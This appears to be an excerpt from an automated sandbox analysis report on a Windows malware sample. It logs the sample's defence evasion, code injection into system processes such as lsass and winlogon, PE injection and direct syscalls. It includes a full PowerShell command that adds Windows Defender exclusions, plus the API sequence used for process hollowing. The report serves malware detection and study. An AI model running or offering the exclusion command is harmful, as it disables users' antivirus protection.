Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B2C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	47_2_000002992B2C7E70
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B2CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	47_2_000002992B2CB50C

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force			Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 1FC5FF90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 161C7340000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 233B91B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 210918F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2062E960000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 282B8D70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22856DC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 18F9CCD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 207BAC00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 16F9C9D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 27A01800000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\updater.exe base: 80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2992B230000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23227590000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BC9BDC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 28098F60000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23ACD780000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2BBD2B80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F1C1330000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 192A4090000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F8F61C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B5112C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2848B1D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21A12F60000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D8115C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2C8B4690000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BF9EBD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 213C6680000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: B80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 25B905C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2905A8E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BADC5B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A5FA180000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19296180000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24ED0990000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20955360000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 27D95820000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B054660000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 15D00D80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20983090000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1FBDB1C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 278CACC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DF6DEC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 13AD1CA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DAE2270000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 1FD1BED0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 284FF340000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 226857D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17CCCCC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B661F20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 281EEB30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD637D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: B10000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2081CC80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1EFC6EF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23263180000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 2064B670000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\Runtimeuserer.exe base: 2609B3B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\Runtimeuserer.exe base: 22E30FF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A0E5E00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 1F535400000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\Runtimeuserer.exe base: 238916A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A2C40A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\Runtimeuserer.exe base: 1BA8FD80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\SystemSettingsuserer.exe base: 157081D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 255E3AC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 149A8F80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 21C5D0E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\Runtimeuserer.exe base: 1B97E3B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2A3693C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 184A3070000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\Runtimeuserer.exe base: 2A1E49D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CAA8EE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 250CD600000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 1FCC4AD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1FBCF810000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22CC5DD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1FBDB990000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\updater.exe base: 1C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1757EE20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 22657CE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 251EBAA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 23C4A170000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sc.exe base: 1B9A06B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 23138F50000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\powercfg.exe base: 159F60D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 22FD9460000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\powercfg.exe base: 27A23430000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dialer.exe

Code function: 22_2_00007FF723DE1DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,

22_2_00007FF723DE1DB4

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 5FF92908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C7342908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: B91B2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\dwm.exe EIP: 918F2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2E962908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: B8D72908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 56DC2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 9CCD2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: BAC02908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 9C9D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Program Files\Google\Chrome\updater.exe EIP: 82908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 1802908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2B232908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 27592908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 9BDC2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 98F62908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CD782908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D2B82908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C1332908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A4092908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F61C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 112C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8B1D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 12F62908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 115C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B4692908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9EBD2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C6682908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B82908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 905C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5A8E2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DC5B2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FA182908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 96182908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D0992908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 55362908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 95822908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 54662908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D82908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 83092908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DB1C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CACC2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6DEC2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D1CA2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E2272908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1BED2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FF342908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 857D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CCCC2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 61F22908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EEB32908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 637D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B12908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1CC82908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C6EF2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 63182908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4B672908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9B3B2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 30FF2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E5E02908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 35402908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 916A2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C40A2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8FD82908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 81D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E3AC2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A8F82908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5D0E2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7E3B2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 693C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A3072908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E49D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A8EE2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CD602908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C4AD2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CF812908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C5DD2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: DB992908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Program Files\Google\Chrome\updater.exe EIP: 1C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7EE22908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 57CE2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EBAA2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: 4A172908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A06B2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 38F52908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F60D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: D9462908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 23432908	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x14102FE23
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x141D30D78
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtClose: Direct from: 0x14127EB2F
Source: C:\Program Files\Google\Chrome\updater.exe	NtUnmapViewOfSection: Direct from: 0x141D25827
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1412A5908
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1412954E7
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1412C0ABC
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtProtectVirtualMemory: Direct from: 0x141D27DE5	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Indirect: 0x140FFF996
Source: C:\Program Files\Google\Chrome\updater.exe	NtMapViewOfSection: Direct from: 0x1415CE6E3
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1415D0BA0
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtProtectVirtualMemory: Direct from: 0x141040B0A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtProtectVirtualMemory: Direct from: 0x141010990	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtOpenFile: Direct from: 0x1412C06A6
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1415D9FAA
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtProtectVirtualMemory: Direct from: 0x1415C2178	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtClose: Direct from: 0x14104B95B
Source: C:\Program Files\Google\Chrome\updater.exe	NtAdjustPrivilegesToken: Direct from: 0x14000749E
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtProtectVirtualMemory: Direct from: 0x1412C3489	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1412772D4
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtOpenFile: Direct from: 0x1412B585D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtUnmapViewOfSection: Direct from: 0x141299226	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1412AA8B7
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1412B5883
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtProtectVirtualMemory: Direct from: 0x1412B2323	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtProtectVirtualMemory: Direct from: 0x1415D841E
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	NtProtectVirtualMemory: Direct from: 0x1415E28CB	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1FC5FF90000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 161C7340000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 233B91B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 210918F0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2062E960000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 282B8D70000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22856DC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 18F9CCD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 207BAC00000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 16F9C9D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27A01800000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\updater.exe base: 80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2992B230000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23227590000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BC9BDC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28098F60000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23ACD780000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BBD2B80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F1C1330000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 192A4090000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F8F61C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5112C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2848B1D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A12F60000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D8115C0000 value starts with: 4D5A	Jump to behavior
